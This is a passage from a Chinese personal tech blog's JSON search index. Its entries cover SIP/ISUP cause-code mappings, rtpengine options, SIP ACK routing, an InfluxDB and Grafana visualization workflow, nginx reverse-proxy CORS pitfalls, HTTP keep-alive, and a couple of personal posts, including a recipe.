https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","title":"IP协议 Protocol"},{"content":" ","permalink":"https://wdd.js.org/network/ibhy8a/","summary":" ","title":"从飞机航线讲解网络分层"},{"content":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。\n","permalink":"https://wdd.js.org/fe/copy-as-curl-and-copy-response/","summary":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。","title":"Copy as CURL and Copy Response"},{"content":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","permalink":"https://wdd.js.org/posts/2020/02/edtzzx/","summary":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","title":"如何烧肉才好吃"},{"content":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code. the cause value received in the H.225.0 message is unknown in ISUP, the unspecified cause value of the class is sent.(=) ANSI procedure SIP to ISDN Response received Cause value in the REL.\nSIP Status Code ISDN Map 400 - Bad Request 41 – Temporary failure 401 - Unauthorized 21 – Call rejected (*) 402 - Payment required 21 – Call rejected 403 - Forbidden 21 – Call rejected 404 - Not Found 1 – Unallocated number 405 - Method not allowed 63 – Service or option unavailable 406 - Not acceptable 79 – Service/option not implemented (+) 407 - Proxy authentication required 21 – Call rejected (*) 408 - Request timeout 102 – Recovery on timer expiry 410 - Gone 22 – Number changed (w/o diagnostic) 413 - Request Entity too long 127 – Interworking (+) 414 - Request –URI too long 127 – Interworking (+) 415 - Unsupported media type 79 – Service/option not implemented (+) 416 - Unsupported URI Scheme 127 – Interworking (+) 402 - Bad extension 127 – Interworking (+) 421 - Extension Required 127 – Interworking (+) 423 - Interval Too Brief 127 – Interworking (+) 480 - Temporarily unavailable 18 – No user responding 481 - Call/Transaction Does not Exist 41 – Temporary Failure 482 - Loop Detected 25 – Exchange – routing error 483 - Too many hops 25 – Exchange – routing error 484 - Address incomplete 28 – Invalid Number Format (+) 485 - Ambiguous 1 – Unallocated number 486 - Busy here 17 – User Busy 487 - Request Terminated \u0026mdash; (no mapping) 488 - Not Acceptable here \u0026mdash; by warning header 500 - Server internal error 41 – Temporary Failure 501 - Not implemented 79 – Not implemented, unspecified 502 - Bad gateway 38 – Network out of order 503 - Service unavailable 41 – Temporary Failure 504 - Service time-out 102 – Recovery on timer expiry 505 - Version Not supported 127 – Interworking (+) 513 - Message Too Large 127 – Interworking (+) 600 - Busy everywhere 17 – User busy 603 - Decline 21 – Call rejected 604 - Does not exist anywhere 1 – Unallocated number 606 - Not acceptable \u0026mdash; by warning header 参考 https://www.dialogic.com/webhelp/BorderNet2020/1.1.0/WebHelp/cause_code_map_ss7_sip.htm ","permalink":"https://wdd.js.org/opensips/ch9/isup-sip-isdn/","summary":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code.","title":"ISUP SIP ISDN对照码表"},{"content":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!IP] ** Local interface for RTP -k, \u0026ndash;subscribe-keyspace=INT INT \u0026hellip; Subscription keyspace list -l, \u0026ndash;listen-tcp=[IP:]PORT TCP port to listen on -u, \u0026ndash;listen-udp=[IP46|HOSTNAME:]PORT UDP port to listen on -n, \u0026ndash;listen-ng=[IP46|HOSTNAME:]PORT UDP port to listen on, NG protocol **-c, \u0026ndash;listen-cli=[IP46|HOSTNAME:]PORT ** UDP port to listen on, CLI -g, \u0026ndash;graphite=IP46|HOSTNAME:PORT Address of the graphite server -G, \u0026ndash;graphite-interval=INT Graphite send interval in seconds \u0026ndash;graphite-prefix=STRING Prefix for graphite line -T, \u0026ndash;tos=INT Default TOS value to set on streams \u0026ndash;control-tos=INT Default TOS value to set on control-ng -o, \u0026ndash;timeout=SECS RTP timeout -s, \u0026ndash;silent-timeout=SECS RTP timeout for muted -a, \u0026ndash;final-timeout=SECS Call timeout \u0026ndash;offer-timeout=SECS Timeout for incomplete one-sided calls **-m, \u0026ndash;port-min=INT ** Lowest port to use for RTP **-M, \u0026ndash;port-max=INT ** Highest port to use for RTP -r, \u0026ndash;redis=[PW@]IP:PORT/INT Connect to Redis database -w, \u0026ndash;redis-write=[PW@]IP:PORT/INT Connect to Redis write database \u0026ndash;redis-num-threads=INT Number of Redis restore threads \u0026ndash;redis-expires=INT Expire time in seconds for redis keys -q, \u0026ndash;no-redis-required Start no matter of redis connection state \u0026ndash;redis-allowed-errors=INT Number of allowed errors before redis is temporarily disabled \u0026ndash;redis-disable-time=INT Number of seconds redis communication is disabled because of errors \u0026ndash;redis-cmd-timeout=INT Sets a timeout in milliseconds for redis commands \u0026ndash;redis-connect-timeout=INT Sets a timeout in milliseconds for redis connections -b, \u0026ndash;b2b-url=STRING XMLRPC URL of B2B UA \u0026ndash;log-facility-cdr=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging CDRs \u0026ndash;log-facility-rtcp=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging RTCP \u0026ndash;log-facility-dtmf=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging DTMF \u0026ndash;log-format=default|parsable Log prefix format \u0026ndash;dtmf-log-dest=IP46|HOSTNAME:PORT Destination address for DTMF logging via UDP -x, \u0026ndash;xmlrpc-format=INT XMLRPC timeout request format to use. 0: SEMS DI, 1: call-id only, 2: Kamailio \u0026ndash;num-threads=INT Number of worker threads to create \u0026ndash;media-num-threads=INT Number of worker threads for media playback -d, \u0026ndash;delete-delay=INT Delay for deleting a session from memory. \u0026ndash;sip-source Use SIP source address by default \u0026ndash;dtls-passive Always prefer DTLS passive role \u0026ndash;max-sessions=INT Limit of maximum number of sessions \u0026ndash;max-load=FLOAT Reject new sessions if load averages exceeds this value \u0026ndash;max-cpu=FLOAT Reject new sessions if CPU usage (in percent) exceeds this value \u0026ndash;max-bandwidth=INT Reject new sessions if bandwidth usage (in bytes per second) exceeds this value \u0026ndash;homer=IP46|HOSTNAME:PORT Address of Homer server for RTCP stats \u0026ndash;homer-protocol=udp|tcp Transport protocol for Homer (default udp) \u0026ndash;homer-id=INT \u0026lsquo;Capture ID\u0026rsquo; to use within the HEP protocol \u0026ndash;recording-dir=FILE Directory for storing pcap and metadata files \u0026ndash;recording-method=pcap|proc Strategy for call recording \u0026ndash;recording-format=raw|eth File format for stored pcap files \u0026ndash;iptables-chain=STRING Add explicit firewall rules to this iptables chain \u0026ndash;codecs Print a list of supported codecs and exit \u0026ndash;scheduling=default|none|fifo|rr|other|batch|idle Thread scheduling policy \u0026ndash;priority=INT Thread scheduling priority \u0026ndash;idle-scheduling=default|none|fifo|rr|other|batch|idle Idle thread scheduling policy \u0026ndash;idle-priority=INT Idle thread scheduling priority \u0026ndash;log-srtp-keys Log SRTP keys to error log \u0026ndash;mysql-host=HOST|IP MySQL host for stored media files \u0026ndash;mysql-port=INT MySQL port \u0026ndash;mysql-user=USERNAME MySQL connection credentials \u0026ndash;mysql-pass=PASSWORD MySQL connection credentials \u0026ndash;mysql-query=STRING MySQL select query \u0026ndash;endpoint-learning=delayed|immediate|off|heuristic RTP endpoint learning algorithm \u0026ndash;jitter-buffer=INT Size of jitter buffer \u0026ndash;jb-clock-drift Compensate for source clock drift 参考 https://github.com/sipwise/rtpengine ","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-manu/","summary":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!","title":"rtpengine"},{"content":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有ACK ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事物 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contac头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就发发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-ack/","summary":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有ACK ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事物 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contac头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就发发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。","title":"深入理解SIP ACK 方法"},{"content":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。\n但是这种方式过于繁琐,每次都要写个Echars的Options。\n所以我想,如果把数据写入influxdb,然后用grafana去做可视化,那岂不是十分方便。\n所以,我们要把数据导入influxdb。\n启动influxdb grafana 下面是一个Makefile, 用来启动容器。\nmake create-network 用来创建两个容器的网络,这样grafana就可以通过容器名访问influxdb了。 make run-influxdb 启动influxdb,其中8086端口是influxdb对外提供服务的端口 make run-grafana 启动grafana, 其中3000端口是grafana对外提供服务的端口 run-influxdb: docker run -d -p 8083:8083 -p 8086:8086 --network b2 --name influxdb influxdb:latest run-grafana: docker run -d --name grafana --network b2 -p 3000:3000 grafana/grafana create-network: docker network create -d bridge --ip-range=192.168.1.0/24 --gateway=192.168.1.1 --subnet=192.168.1.0/24 b2 接着你打开localhost:3000端口,输入默认的用户名密码 admin/amdin来登录\n创建默认的数据库\n进入influxb的容器中创建数据库\ndocker exec -it influxdb bash influx create database mydb grafana中添加influxdb数据源\n使用curl上传数据到influxdb\ncurl -i -XPOST \u0026#34;http://localhost:8086/write?db=mydb\u0026#34; --data-binary @data.log.out grafana上添加dashboard 结论 通过使用influxb来存储数据,grafana来做可视化。每次需要分析的时候,我需要做的仅仅只是写个脚本去规整数据,这样就大大提供了分析效率。\n","permalink":"https://wdd.js.org/posts/2020/02/mrgkvf/","summary":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。","title":"我的数据可视化处理过程"},{"content":"特征维度 特征项 集中 无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","permalink":"https://wdd.js.org/posts/2020/02/rx59i2/","summary":"特征维度 特征项 集中 无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","title":"故障的特征分析方法"},{"content":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed. Have the server send the header with a valid value, or, if an opaque response serves your needs, set the request\u0026#39;s mode to \u0026#39;no-cors\u0026#39; to fetch the resource with CORS disabled. 参考链接 http://nginx.org/en/docs/http/ngx_http_headers_module.html http://www.hxs.biz/html/20180425122255.html https://blog.csdn.net/xiojing825/article/details/83383524 https://cloud.tencent.com/developer/article/1470375 https://blog.csdn.net/bbg221/article/details/79886979 ","permalink":"https://wdd.js.org/posts/2020/02/ngse8g/","summary":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed.","title":"我走过的nginx反向代理的坑"},{"content":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。\n","permalink":"https://wdd.js.org/posts/2020/02/amkcs2/","summary":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。","title":"kindle阅读器的寿命"},{"content":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。客户端在响应头中回应Connection: Keep-Alive。则说明客户端同意持久连接。\n如果客户端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WIAT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。\n","permalink":"https://wdd.js.org/network/sq4l53/","summary":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。客户端在响应头中回应Connection: Keep-Alive。则说明客户端同意持久连接。\n如果客户端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WIAT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of 